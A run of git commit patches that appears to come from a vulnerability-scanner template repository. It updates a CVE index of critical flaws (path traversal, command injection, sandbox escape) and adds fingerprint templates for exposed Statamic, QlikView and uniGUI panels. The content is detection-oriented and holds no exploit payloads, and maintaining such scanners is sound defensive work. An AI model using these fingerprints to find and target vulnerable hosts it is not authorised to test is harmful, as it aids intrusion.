\u003c 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31848.yaml"} +{"ID":"CVE-2024-31849","Info":{"Name":"CData Connect \u003c 23.4.8846 - Path Traversal","Severity":"critical","Description":"A path traversal vulnerability exists in the Java version of CData Connect \u003c 23.4.8846 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2024/CVE-2024-31849.yaml"} +{"ID":"CVE-2024-31850","Info":{"Name":"CData Arc \u003c 23.4.8839 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability exists in the Java version of CData Arc \u003c 23.4.8839 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-31850.yaml"} +{"ID":"CVE-2024-31851","Info":{"Name":"CData Sync \u003c 23.4.8843 - Path Traversal","Severity":"high","Description":"A path traversal vulnerability exists in the Java version of CData Sync \u003c 23.4.8843 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain access to sensitive information and perform limited actions.\n","Classification":{"CVSSScore":"8.6"}},"file_path":"http/cves/2024/CVE-2024-31851.yaml"} {"ID":"CVE-2024-32399","Info":{"Name":"RaidenMAILD Mail Server v.4.9.4 - Path Traversal","Severity":"high","Description":"Directory Traversal vulnerability in RaidenMAILD Mail Server v.4.9.4 and before allows a remote attacker to obtain sensitive information via the /webeditor/ component.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32399.yaml"} +{"ID":"CVE-2024-32640","Info":{"Name":"Mura/Masa CMS - SQL Injection","Severity":"critical","Description":"The Mura/Masa CMS is vulnerable to SQL Injection.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-32640.yaml"} +{"ID":"CVE-2024-32651","Info":{"Name":"Change Detection - Server Side Template Injection","Severity":"critical","Description":"A Server Side Template Injection in changedetection.io caused by usage of unsafe functions of Jinja2 allows Remote Command Execution on the server host.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-32651.yaml"} {"ID":"CVE-2024-3273","Info":{"Name":"D-Link Network Attached Storage - Command Injection and Backdoor Account","Severity":"high","Description":"UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as critical, was found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. Affected is an unknown function of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument system leads to command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-259284. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced.\n","Classification":{"CVSSScore":"7.3"}},"file_path":"http/cves/2024/CVE-2024-3273.yaml"} +{"ID":"CVE-2024-33575","Info":{"Name":"User Meta WP Plugin \u003c 3.1 - Sensitive Information Exposure","Severity":"medium","Description":"The User Meta is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.0 via the /views/debug.php file. This makes it possible for unauthenticated attackers, with to extract sensitive configuration data.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2024/CVE-2024-33575.yaml"} +{"ID":"CVE-2024-33724","Info":{"Name":"SOPlanning 1.52.00 Cross Site Scripting","Severity":"medium","Description":"SOPlanning v1.52.00 is vulnerable to XSS via the 'groupe_id' parameters a remote unautheticated attacker can hijack the admin account or other users. The remote attacker can hijack a users session or credentials and perform a takeover of the entire platform.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2024/CVE-2024-33724.yaml"} {"ID":"CVE-2024-3400","Info":{"Name":"GlobalProtect - OS Command Injection","Severity":"critical","Description":"A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-3400.yaml"} {"ID":"CVE-2024-4040","Info":{"Name":"CrushFTP VFS - Sandbox Escape LFR","Severity":"critical","Description":"VFS Sandbox Escape in CrushFTP in all versions before 10.7.1 and 11.1.0 on all platforms allows remote attackers with low privileges to read files from the filesystem outside of VFS Sandbox.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2024/CVE-2024-4040.yaml"} {"ID":"CVE-2024-4348","Info":{"Name":"osCommerce v4.0 - Cross-site Scripting","Severity":"medium","Description":"A vulnerability, which was classified as problematic, was found in osCommerce 4. Affected is an unknown function of the file /catalog/all-products. The manipulation of the argument cat leads to cross site scripting. It is possible to launch the attack remotely.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2024/CVE-2024-4348.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 9332b13391..47012701c5 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -56b04172c1df6906eb35bc5859e652a2 +235e457ee422c2956ae8e7b3cc7ca1d6 From 76a885b28ce3e5b57f24e6dc01ed621fa54e7c3d Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 12 May 2024 08:07:29 +0000 Subject: [PATCH 0825/1768] Auto Generated New Template Addition List [Sun May 12 08:07:29 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 4921ec9466..e7b8a24d15 100644 --- a/.new-additions +++ b/.new-additions @@ -1,5 +1,7 @@ +http/cves/2023/CVE-2023-43374.yaml http/cves/2024/CVE-2024-0200.yaml http/exposed-panels/craftercms-panel.yaml +http/exposed-panels/unleash-panel.yaml http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml http/technologies/craftercms-detect.yaml From cc6931ae66aff704f26c8efd01e81b4075f5c4c2 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:07:35 +0000 Subject: [PATCH 0826/1768] Auto Generated Templates Checksum [Sun May 12 08:07:35 UTC 2024] :robot: --- templates-checksum.txt | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 426cc491fb..100d4525f4 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -187,8 +187,8 @@ code/privilege-escalation/linux/rw-sudoers.yaml:f974b1d1a68fd7a8cd24b6f1b61855dd code/privilege-escalation/linux/sudo-nopasswd.yaml:3117c141f35b9229b6ebe1db10a4fef77aa6ee17 code/privilege-escalation/linux/writable-etc-passwd.yaml:c0ad4796f42aab9c901b52b52b91940172d070e9 contributors.json:951e2ab8bbae42da01f52da9ef0a14ce7f17e159 -cves.json:0820bc134ca52d7071cc8c6596b3ac37a095a0ae -cves.json-checksum.txt:996eafaef74b06977788950a04aeebf48b096611 +cves.json:0058f7deab6259dbd38b4404ee74975e45bc4f75 +cves.json-checksum.txt:c9eed153337837c2ce6b2ce89bb9bd59d39758a9 dast/cves/2018/CVE-2018-19518.yaml:06ecee25413d9f238e2ae0138b4775f0243e8d22 dast/cves/2021/CVE-2021-45046.yaml:d470397419ae4ef5db02b0a833013fe295576396 dast/cves/2022/CVE-2022-34265.yaml:e006df0567f928e43d40050f55d5928a3fbff17e @@ -217,7 +217,7 @@ dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 dns/dmarc-detect.yaml:d60f87ac8a617c0496d558269abd50389bbb1b37 dns/dns-rebinding.yaml:45774e6d0aabacb2fcf032dc41deb3073c8abba6 dns/dns-saas-service-detection.yaml:d43ab2edca6bc38254ad1f4c4889e5cece34691e -dns/dns-waf-detect.yaml:7f32662209d10627c60fca75caa4e03799703113 +dns/dns-waf-detect.yaml:305812728bc0395016f22f5b4c04f634a9fb4ad4 dns/dnssec-detection.yaml:ce828fea84336b2c79b18479063e1e1aaf083592 dns/ec2-detection.yaml:689933e484835fda36da5f3402df123405cc8644 dns/elasticbeanstalk-takeover.yaml:d6be1fd0a3ee4d72149e942bcf77b93c175c1588 @@ -3694,7 +3694,7 @@ http/exposed-panels/couchdb-exposure.yaml:ff98d142744ff74de39b724b5733b9584e3969 http/exposed-panels/couchdb-fauxton.yaml:b0447223641003425221f1a22f1809b82bc64558 http/exposed-panels/cpanel-api-codes.yaml:a26ac3c4c4cb3e32b40376f94d2d4cd90387ead7 http/exposed-panels/craftcms-admin-panel.yaml:ad84bef6e6da1edf763aad80aaa6de3a91d2f395 -http/exposed-panels/craftercms-panel.yaml:549ab470d58023ba1996a92b5918a532bb472c8b +http/exposed-panels/craftercms-panel.yaml:7746ab0c30459db7e6f5bf023bf55ec47a7eeb90 http/exposed-panels/creatio-login-panel.yaml:be251ed8449b36fffd157869473e9d02d523f573 http/exposed-panels/crontab-ui.yaml:7504a353c3dc9824fefa0aae8181f1d1432e8ed9 http/exposed-panels/crush-ftp-login.yaml:fd6d8e7854c0b21aefe3ccd2c888a28e5605a996 @@ -4448,6 +4448,7 @@ http/exposed-panels/unauth-xproxy-dashboard.yaml:c01ec537b431a19a6379b6616d1656c http/exposed-panels/unauthenticated-frp.yaml:7dce249491443ca0f4d7954e2a0fed07a90418d6 http/exposed-panels/unibox-panel.yaml:cdf9eb8ff2bb47a65d41b11e01c20e80e129fc42 http/exposed-panels/unifi-panel.yaml:7453d0729a5fd66914347f5ee4a41a958b05cd1e +http/exposed-panels/unleash-panel.yaml:55fc803c4901e3ece2d6d0ff3a273dbb403b7f52 http/exposed-panels/untangle-admin-login.yaml:e608572d5f228bc2af5c784d0944ec5cd7e6174b http/exposed-panels/uptime-kuma-panel.yaml:422d9cf4aa37790f9729c374453d9a4c7a3cfa88 http/exposed-panels/urbackup-panel.yaml:907afaf682a672c3770668b8c640cbf7bb233d8a @@ -5404,7 +5405,7 @@ http/misconfiguration/installer/mcloud-installer.yaml:833e2575e02b6336777860b535 http/misconfiguration/installer/metaview-explorer-installer.yaml:1b9dce3e9610d021aa211b44ed5397207c241be9 http/misconfiguration/installer/monstra-installer.yaml:bcc03eec7693c2c9e5c960958ab70b00bcea40bf http/misconfiguration/installer/moodle-installer.yaml:79053437435e1590bb58eb747a87109c8c5d026b -http/misconfiguration/installer/moosocial-installer.yaml:02d115a28e24b592b0088b1c0a286c7b2f26161b +http/misconfiguration/installer/moosocial-installer.yaml:fcb42a5d3af9d846ec71cc165bde4962bb381c71 http/misconfiguration/installer/mosparo-install.yaml:0b6f15dce7c5579e4e7a2db365050972b8be308a http/misconfiguration/installer/nagiosxi-installer.yaml:3dbd7b4606de96c3d2ef86245924586928ade5c9 http/misconfiguration/installer/netsparker-enterprise-installer.yaml:87452a1aa538401b678c40487818511b300f67d2 @@ -8506,7 +8507,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:5c371db8064ff0116c0cf564c176e0dd4288a057 +templates-checksum.txt:884344860c187a106c81b270a24e6a1e612a56b7 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 89ffcb57bff412e272d7dc1bbd7550454a0ad76b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Sun, 12 May 2024 13:37:48 +0530 Subject: [PATCH 0827/1768] Update and rename unigui-server-monitor-exposure.yaml to http/misconfiguration/unigui-server-monitor-exposure.yaml --- .../misconfiguration/unigui-server-monitor-exposure.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename unigui-server-monitor-exposure.yaml => http/misconfiguration/unigui-server-monitor-exposure.yaml (100%) diff --git a/unigui-server-monitor-exposure.yaml b/http/misconfiguration/unigui-server-monitor-exposure.yaml similarity index 100% rename from unigui-server-monitor-exposure.yaml rename to http/misconfiguration/unigui-server-monitor-exposure.yaml From 8fc2e6db52c954d9f4341264537e35ea8991e4bd Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 12 May 2024 08:08:17 +0000 Subject: [PATCH 0828/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index c1db7f4338..6194f47444 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -3,8 +3,10 @@ on: push: paths: - '.new-additions' + - 'http/cves/2023/CVE-2023-43374.yaml' - 'http/cves/2024/CVE-2024-0200.yaml' - 'http/exposed-panels/craftercms-panel.yaml' + - 'http/exposed-panels/unleash-panel.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' - 'http/technologies/craftercms-detect.yaml' From ed6d05149481fba6147ab9aea9a8bf732baf86f4 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:09:26 +0000 Subject: [PATCH 0829/1768] Auto Template Signing [Sun May 12 08:09:26 UTC 2024] :robot: --- http/cves/2023/CVE-2023-43374.yaml | 1 + http/exposed-panels/unleash-panel.yaml | 1 + http/technologies/tinyproxy-detect.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/http/cves/2023/CVE-2023-43374.yaml b/http/cves/2023/CVE-2023-43374.yaml index 65b4325ac3..1b20ba9e04 100644 --- a/http/cves/2023/CVE-2023-43374.yaml +++ b/http/cves/2023/CVE-2023-43374.yaml @@ -61,3 +61,4 @@ http: - 'status_code == 200' - 'contains(body, "HotelDruid:")' condition: and +# digest: 4a0a00473045022100e833bee8477a7d35d428595751237754df5f6dcd346f312d7bd3b39aff1ce502022073b0e42e337aadd7c1cd77196e08e3ecada460c031dca3ecfd850b727521655f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/unleash-panel.yaml b/http/exposed-panels/unleash-panel.yaml index c3378ef0b9..1aa5ff3ef6 100644 --- a/http/exposed-panels/unleash-panel.yaml +++ b/http/exposed-panels/unleash-panel.yaml @@ -37,3 +37,4 @@ http: - type: dsl dsl: - "status_code==200 && (\"-608690655\" == mmh3(base64_py(body)))" +# digest: 490a00463044022014fd08bb5e7f980ecf35eb263ef728dff1b0b8ca20cfee86410abeb3f180c9c5022036ad4163750eaee7d3271a6ccc3f10245b3d4aa1a16be7f68e9eb6e04b2e54c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/tinyproxy-detect.yaml b/http/technologies/tinyproxy-detect.yaml index e571cd5694..a0cb2d92c8 100644 --- a/http/technologies/tinyproxy-detect.yaml +++ b/http/technologies/tinyproxy-detect.yaml @@ -30,3 +30,4 @@ http: - type: kval kval: - server +# digest: 4b0a004830460221008ec97763de41920c6428a4b0e039d72a2a87b2e8d2fd891cfa7a70b0bd2c7ddc022100a1fbedfc84f6e0aaf4233a640e2589dfc2341243472f7125eb47bc15a3917e65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 937c9fda616508bc55b0e3353f38c8d948d70114 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 12 May 2024 08:12:23 +0000 Subject: [PATCH 0830/1768] Auto Generated New Template Addition List [Sun May 12 08:12:23 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e7b8a24d15..2d8595fdb8 100644 --- a/.new-additions +++ b/.new-additions @@ -4,5 +4,6 @@ http/exposed-panels/craftercms-panel.yaml http/exposed-panels/unleash-panel.yaml http/misconfiguration/installer/moosocial-installer.yaml http/misconfiguration/installer/phpmyfaq-installer.yaml +http/misconfiguration/unigui-server-monitor-exposure.yaml http/technologies/craftercms-detect.yaml http/technologies/tinyproxy-detect.yaml From 452d3efb238479933bc2b9c603dfd417ac14b08c Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:12:29 +0000 Subject: [PATCH 0831/1768] Auto Generated Templates Checksum [Sun May 12 08:12:29 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 100d4525f4..c6e2834914 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3155,7 +3155,7 @@ http/cves/2023/CVE-2023-43208.yaml:fe7941493bcf8b59fd55d2e57288bbb985cf2d65 http/cves/2023/CVE-2023-43261.yaml:4e229f26b444802b453164764a7f455c69bbcb56 http/cves/2023/CVE-2023-43325.yaml:7849edeca0eb8481c4a3aed6c3589196b6cef4a6 http/cves/2023/CVE-2023-43326.yaml:57d65b95951cc3b5e326ad3790f27d15e83d3a4d -http/cves/2023/CVE-2023-43374.yaml:4f7f62c35a898225da4c40a9b44f77de5b0f84e9 +http/cves/2023/CVE-2023-43374.yaml:cf29b56d8ba36ab18d35d83a0105cbe76841ec1f http/cves/2023/CVE-2023-43795.yaml:a14750da396529474d303182bee73893d7f284c9 http/cves/2023/CVE-2023-4415.yaml:21b79187558e4d88b2c453cfe6c99cc13c84fccb http/cves/2023/CVE-2023-44352.yaml:838f6b730d02b9335f6e41cfa6f1e28ab7c3828e @@ -4448,7 +4448,7 @@ http/exposed-panels/unauth-xproxy-dashboard.yaml:c01ec537b431a19a6379b6616d1656c http/exposed-panels/unauthenticated-frp.yaml:7dce249491443ca0f4d7954e2a0fed07a90418d6 http/exposed-panels/unibox-panel.yaml:cdf9eb8ff2bb47a65d41b11e01c20e80e129fc42 http/exposed-panels/unifi-panel.yaml:7453d0729a5fd66914347f5ee4a41a958b05cd1e -http/exposed-panels/unleash-panel.yaml:55fc803c4901e3ece2d6d0ff3a273dbb403b7f52 +http/exposed-panels/unleash-panel.yaml:be51937dd1d4f1ac7feadf1883b3026016d08f53 http/exposed-panels/untangle-admin-login.yaml:e608572d5f228bc2af5c784d0944ec5cd7e6174b http/exposed-panels/uptime-kuma-panel.yaml:422d9cf4aa37790f9729c374453d9a4c7a3cfa88 http/exposed-panels/urbackup-panel.yaml:907afaf682a672c3770668b8c640cbf7bb233d8a @@ -5699,6 +5699,7 @@ http/misconfiguration/unauthenticated-zipkin.yaml:73f69a3db4803b395469ae1d03d6a8 http/misconfiguration/unauthorized-h3csecparh-login.yaml:52ba2425210b300862c20a149417b849615ac9e0 http/misconfiguration/unauthorized-plastic-scm.yaml:f0b988e5aa54ff9c9d233a6a15796cfdb4270569 http/misconfiguration/unauthorized-puppet-node-manager-detect.yaml:eb1d62caa10228fd5847ef05c1ba56eef9756320 +http/misconfiguration/unigui-server-monitor-exposure.yaml:5a8953fafae644cf0bbdc56331df911747272ecf http/misconfiguration/untangle-admin-setup.yaml:48ca3177690a4ffd930faf99a443caade96231c7 http/misconfiguration/ups-status.yaml:e72e5c146b99b7efed8a61faf81517cc5f9e9736 http/misconfiguration/v2x-control.yaml:1e5196bc738b2850f7c29df0a9af5e933fde4e7f @@ -6927,7 +6928,7 @@ http/technologies/thinkphp-detect.yaml:4f4c4b8bb5ea605c7dd26335d710811935db624d http/technologies/tibco-businessconnect-detect.yaml:df1e040bbfa4c989246929173292176c9f5e3137 http/technologies/tibco-spotfire-services-detect.yaml:26a79d78f2c140283420e74921930270ad17851a http/technologies/tileserver-gl.yaml:27fe637c0f3de39676585f41d5980e246441bdab -http/technologies/tinyproxy-detect.yaml:ec51387f8f975ce3da63f0a9a675e9a6d7396c92 +http/technologies/tinyproxy-detect.yaml:1f12faf3ae2dd38f5c8f0aed9753d65ce611b795 http/technologies/tor-socks-proxy.yaml:ad664f3598d1039dd335f4128e1cb81ceeef4864 http/technologies/tornado-server-login.yaml:7d8148d6ca18ef79abc33aceacbf8dbafd31d4d4 http/technologies/typo3-detect.yaml:206df0bc720861958780557535b8b4693ec64636 @@ -8507,7 +8508,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:884344860c187a106c81b270a24e6a1e612a56b7 +templates-checksum.txt:8236c7940702769898d0b91e1e5ce69744a9d159 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 66fb30a1bfeb495d4b94044c428b213415f13150 Mon Sep 17 00:00:00 2001 From: "[PDBot]" <bot@projectdiscovery.io> Date: Sun, 12 May 2024 08:13:10 +0000 Subject: [PATCH 0832/1768] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 6194f47444..db0d204223 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -9,6 +9,7 @@ on: - 'http/exposed-panels/unleash-panel.yaml' - 'http/misconfiguration/installer/moosocial-installer.yaml' - 'http/misconfiguration/installer/phpmyfaq-installer.yaml' + - 'http/misconfiguration/unigui-server-monitor-exposure.yaml' - 'http/technologies/craftercms-detect.yaml' - 'http/technologies/tinyproxy-detect.yaml' workflow_dispatch: From 22ea10d5a95d339c499ed989d3e59363e22f8377 Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 08:14:08 +0000 Subject: [PATCH 0833/1768] Auto Template Signing [Sun May 12 08:14:08 UTC 2024] :robot: --- http/misconfiguration/unigui-server-monitor-exposure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/misconfiguration/unigui-server-monitor-exposure.yaml b/http/misconfiguration/unigui-server-monitor-exposure.yaml index 922ef2f2aa..ff0d6eee1f 100644 --- a/http/misconfiguration/unigui-server-monitor-exposure.yaml +++ b/http/misconfiguration/unigui-server-monitor-exposure.yaml @@ -33,3 +33,4 @@ http: - 'contains(body, "layout:\"fit\",title:\"uniGUI Standalone Server\"")' - 'contains(body, "layout:\"absolute\",title:\"Server Statistics\"")' condition: or +# digest: 490a0046304402205766cced7933a5f2f8ba6e4cd966dad51910774c86ee9260bb819ad300d147570220621881cf5155550a9207b7e19241b39c6a0df15d8629dac7675d024c80d6f14c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From aafbf077f8fa0f7ae96f1fdbfb2c74a3f410a0f0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sun, 12 May 2024 13:46:56 +0530 Subject: [PATCH 0834/1768] updated matcher & info --- http/technologies/statamic-detect.yaml | 22 +++++++++++++++------- 1 file changed, 15 insertions(+), 7 deletions(-) diff --git a/http/technologies/statamic-detect.yaml b/http/technologies/statamic-detect.yaml index 9b5d841b29..fe4003d1d6 100644 --- a/http/technologies/statamic-detect.yaml +++ b/http/technologies/statamic-detect.yaml @@ -1,20 +1,28 @@ id: statamic-detect info: - name: Statamic Detection - description: Statamic is the flat-first, Laravel + Git powered CMS designed for building beautiful, easy to manage websites. - reference: https://github.com/statamic/cms + name: Statamic - Detect author: geeknik severity: info - tags: tech,statamic + description: | + Statamic is the flat-first, Laravel + Git powered CMS designed for building beautiful, easy to manage websites. + reference: + - https://github.com/statamic/cms + metadata: + verified: true + max-request: 1 + shodan-query: "Statamic" + tags: tech,statamic,detect http: - method: GET path: - "{{BaseURL}}" + host-redirects: true + max-redirects: 2 matchers: - - type: word + - type: regex part: header - words: - - 'X-Powered-By: Statamic' + regex: + - 'X-Powered-By:(.*)Statamic' From c6f19fd2af9eed892f538216c91af071ddd9d11b Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 09:48:41 +0000 Subject: [PATCH 0835/1768] Auto Generated Templates Checksum [Sun May 12 09:48:41 UTC 2024] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index c6e2834914..8ddf9e1922 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -5699,7 +5699,7 @@ http/misconfiguration/unauthenticated-zipkin.yaml:73f69a3db4803b395469ae1d03d6a8 http/misconfiguration/unauthorized-h3csecparh-login.yaml:52ba2425210b300862c20a149417b849615ac9e0 http/misconfiguration/unauthorized-plastic-scm.yaml:f0b988e5aa54ff9c9d233a6a15796cfdb4270569 http/misconfiguration/unauthorized-puppet-node-manager-detect.yaml:eb1d62caa10228fd5847ef05c1ba56eef9756320 -http/misconfiguration/unigui-server-monitor-exposure.yaml:5a8953fafae644cf0bbdc56331df911747272ecf +http/misconfiguration/unigui-server-monitor-exposure.yaml:e3a54c9004bcf6d77aa157f31df9d027ed46c812 http/misconfiguration/untangle-admin-setup.yaml:48ca3177690a4ffd930faf99a443caade96231c7 http/misconfiguration/ups-status.yaml:e72e5c146b99b7efed8a61faf81517cc5f9e9736 http/misconfiguration/v2x-control.yaml:1e5196bc738b2850f7c29df0a9af5e933fde4e7f @@ -6911,6 +6911,7 @@ http/technologies/splunkhec-detect.yaml:b12fe8414a25f23ca27add683cf845cbb65c3f93 http/technologies/spring-detect.yaml:915d140e39b0fd25c725861c526bd2852d3af20a http/technologies/springboot-actuator.yaml:eea78a3c5ccc81b70826132839dd3531ebc07667 http/technologies/springboot-whitelabel.yaml:eb9058fb153f9146a1c1805473ec96199b243184 +http/technologies/statamic-detect.yaml:fe34eae871715d76c164d89ebe0b6c023b51243d http/technologies/strapi-cms-detect.yaml:ab2db3c715882e9487d6cfce22845c3cfb6a5168 http/technologies/subrion-cms-detect.yaml:79c424841060d17ac25109a9ec520c7e0c208bea http/technologies/sucuri-firewall.yaml:4e60a53d2ddcc7b48dc6fcb42149747927a140b4 @@ -8508,7 +8509,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8236c7940702769898d0b91e1e5ce69744a9d159 +templates-checksum.txt:064e83986d9c777dd50b8e1c049b4504b0504818 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From d32712c2f0df6515077bcb9cc211293c126be37e Mon Sep 17 00:00:00 2001 From: GitHub Action <action@github.com> Date: Sun, 12 May 2024 09:50:28 +0000 Subject: [PATCH 0836/1768] Auto Template Signing [Sun May 12 09:50:28 UTC 2024] :robot: --- http/technologies/statamic-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/technologies/statamic-detect.yaml b/http/technologies/statamic-detect.yaml index fe4003d1d6..95c73e7dff 100644 --- a/http/technologies/statamic-detect.yaml +++ b/http/technologies/statamic-detect.yaml @@ -26,3 +26,4 @@ http: part: header regex: - 'X-Powered-By:(.*)Statamic' +# digest: 490a00463044022056716af6b1942e84b678041e3433d215c8a0a61e9a77d2a1ff039396493f930a02205a431e513f4372119b25a1342dc81e41ceeb4173526610df4a7d7e2db3af003d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 9f2955134a41d7f4affb98febbeefb01c8d8f16a Mon Sep 17 00:00:00 2001 From: Dominique RIGHETTO <righettod@users.noreply.github.com> Date: Sun, 12 May 2024 19:48:47 +0200 Subject: [PATCH 0837/1768] Add files via upload --- .../qlikview-accesspoint-panel.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 http/exposed-panels/qlikview-accesspoint-panel.yaml diff --git a/http/exposed-panels/qlikview-accesspoint-panel.yaml b/http/exposed-panels/qlikview-accesspoint-panel.yaml new file mode 100644 index 0000000000..88738607fc --- /dev/null +++ b/http/exposed-panels/qlikview-accesspoint-panel.yaml @@ -0,0 +1,31 @@ +id: qlikview-accesspoint-panel + +info: + name: QlikView AccessPoint Login Panel - Detect + author: righettod + severity: info + description: | + QlikView AccessPoint login panel was detected. + reference: + - https://www.qlik.com/ + - https://help.qlik.com/en-US/qlikview/May2023/Subsystems/QMC/Content/QV_QMC/QMC_System_Setup_QlikViewWebServers_AccessPoint.htm + metadata: + max-request: 1 + verified: true + shodan-query: http.title:"QlikView - AccessPoint" + tags: panel,qlikview,login,detect + +http: + - method: GET + path: + - "{{BaseURL}}" + + redirects: true + max-redirects: 3 + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_any(to_lower(body), "<title>qlikview - accesspoint", "alt=\"qlikview")' + condition: and \ 